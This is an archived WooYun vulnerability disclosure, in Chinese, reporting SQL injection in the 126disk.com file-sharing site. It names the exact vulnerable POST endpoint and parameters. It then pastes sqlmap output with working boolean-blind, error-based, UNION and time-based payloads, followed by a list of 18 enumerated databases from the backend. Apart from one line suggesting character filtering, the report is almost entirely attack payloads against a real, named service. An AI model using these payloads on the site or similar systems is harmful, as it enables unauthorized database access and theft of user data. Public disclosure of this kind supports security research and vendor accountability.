乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-03: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-07-18: 厂商已经主动忽略漏洞,细节向公众公开
126网盘存在SQL注入漏洞(可导致敏感数据受到影响)
注入点http://www.126disk.com:80/index.php?ac=file_ajax&ct=save_form (POST)id=2721384&uid=302178&share=1&fid=0
---Place: POSTParameter: uid Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=2721384&uid=302178 AND 9900=9900&share=1&fid=0 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: id=2721384&uid=302178 AND (SELECT 6506 FROM(SELECT COUNT(*),CONCAT(0x7166686f71,(SELECT (CASE WHEN (6506=6506) THEN 1 ELSE 0 END)),0x71766e7371,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&share=1&fid=0 Type: UNION query Title: MySQL UNION query (NULL) - 7 columns Payload: id=2721384&uid=-5239 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7166686f71,0x47435a6659424d4a4369,0x71766e7371),NULL,NULL#&share=1&fid=0 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=2721384&uid=302178 AND SLEEP(5)&share=1&fid=0Place: POSTParameter: share Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=2721384&uid=302178&share=1 AND 2230=2230&fid=0 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: id=2721384&uid=302178&share=1 AND (SELECT 8511 FROM(SELECT COUNT(*),CONCAT(0x7166686f71,(SELECT (CASE WHEN (8511=8511) THEN 1 ELSE 0 END)),0x71766e7371,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&fid=0 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: id=2721384&uid=302178&share=1 AND SLEEP(5)&fid=0---web application technology: Nginx, PHP 5.3.28back-end DBMS: MySQL 5.0available databases [18]:[*] alipay[*] android[*] apk126disk[*] apk5com[*] disk[*] disk126com[*] information_schema[*] loading[*] mysql[*] performance_schema[*] sopdown[*] test[*] tongji[*] ts27cha[*] www_alipay[*] www_loading[*] www_tongji[*] www_ts27cha
恩恩 过滤特殊字符
未能联系到厂商或者厂商积极拒绝